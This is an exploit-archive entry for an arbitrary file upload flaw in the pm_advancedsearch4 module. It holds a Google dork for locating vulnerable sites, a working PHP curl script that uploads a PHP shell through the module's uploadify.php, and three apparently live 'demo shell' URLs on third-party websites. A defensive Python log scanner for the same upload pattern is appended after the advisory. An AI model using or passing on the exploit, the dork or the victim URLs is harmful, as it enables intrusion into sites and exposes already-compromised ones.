Joomla modules - pm_advancedsearch4 Arbitrary File Upload Vulnerability

2012-12-15T00:00:00
ID 1337DAY-ID-19980
Type zdt
Reporter Zikou-16
Modified 2012-12-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
--------------------------------------------------------------------------------
Joomla modules - pm_advancedsearch4 Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
 

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"pm_advancedsearch4"
#
# Tested on : Windows 7 , Backtrack 5r3 
####

Exploit : uploadshell.php

<?php
$uploadfile="dz.php";
$ch = curl_init("http://localhost/modules/pm_advancedsearch4/js/uploadify/uploadify.php?folder=/modules/pm_advancedsearch4/js/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/modules/pm_advancedsearch4/js/uploadify/50bcd9e474d4c.php
<?php
phpinfo();
?>
------------------------------

[#] Demos Shell :

http://aflyc.bermark.fr/modules/pm_advancedsearch4/js/uploadify/50ccd9ecc4d4c.php
http://stlwax.com/modules/pm_advancedsearch4/js/uploadify/50c5f43d10813.php/
http://www.indicedemode.fr/modules/pm_advancedsearch4/js/uploadify/50a12986c91e1.php

------------------------------ The End

#  0day.today [2018-03-01]  #
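
For defenders, an added detection example (not part of the original advisory or the module's code): it scans web access logs for POSTs to the uploadify.php endpoint above and for requests to 13-hex-character .php files served from the same directory, the naming seen in the shell URLs above. The Combined Log Format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Directory and endpoint come from the advisory; the log format is an assumption.
UPLOAD_DIR = "/modules/pm_advancedsearch4/js/uploadify/"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Files dropped in the advisory have 13-hex-character names ending in .php.
DROPPED_RE = re.compile(r"^[0-9a-f]{13}\.php$", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Dec/2012:10:01:02 +0000] "POST /modules/pm_advancedsearch4/js/uploadify/uploadify.php?folder=/modules/pm_advancedsearch4/js/uploadify/ HTTP/1.1" 200 31 "-" "-"
203.0.113.7 - - [15/Dec/2012:10:01:09 +0000] "GET /modules/pm_advancedsearch4/js/uploadify/0123456789abc.php HTTP/1.1" 200 48211 "-" "-"
192.0.2.9 - - [15/Dec/2012:10:05:00 +0000] "GET /modules/pm_advancedsearch4/js/uploadify/0123456789abc.php/ HTTP/1.1" 200 48211 "-" "-"
198.51.100.4 - - [15/Dec/2012:10:02:00 +0000] "GET /modules/pm_advancedsearch4/js/uploadify/uploadify.css HTTP/1.1" 200 912 "-" "-"
198.51.100.4 - - [15/Dec/2012:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"
"""

def scan(lines):
    """Return (uploads, executions) seen under the uploadify directory."""
    uploads, executions = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip, ts, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])
        if not path.startswith(UPLOAD_DIR):
            continue
        # Trailing "/" (PATH_INFO style) still reaches the same script.
        name = path[len(UPLOAD_DIR):].rstrip("/")
        if method == "POST" and name == "uploadify.php":
            uploads.append((ip, ts, status))
        elif DROPPED_RE.match(name) and status == "200":
            executions.append((ip, ts, name))
    return uploads, executions

def correlated(uploads, executions):
    """Executions requested by an IP that also posted to uploadify.php."""
    uploaders = {ip for ip, _, _ in uploads}
    return [e for e in executions if e[0] in uploaders]

if __name__ == "__main__":
    ups, execs = scan(SAMPLE_LOG.splitlines())
    for ip, ts, status in ups:
        print(f"UPLOAD  {ts} {ip} status={status}")
    for ip, ts, name in execs:
        print(f"SCRIPT  {ts} {ip} {name}")
```

Any entry in the second list on a real server means a PHP file other than the module's own is being served from the upload directory, so the directory on disk should be checked as well.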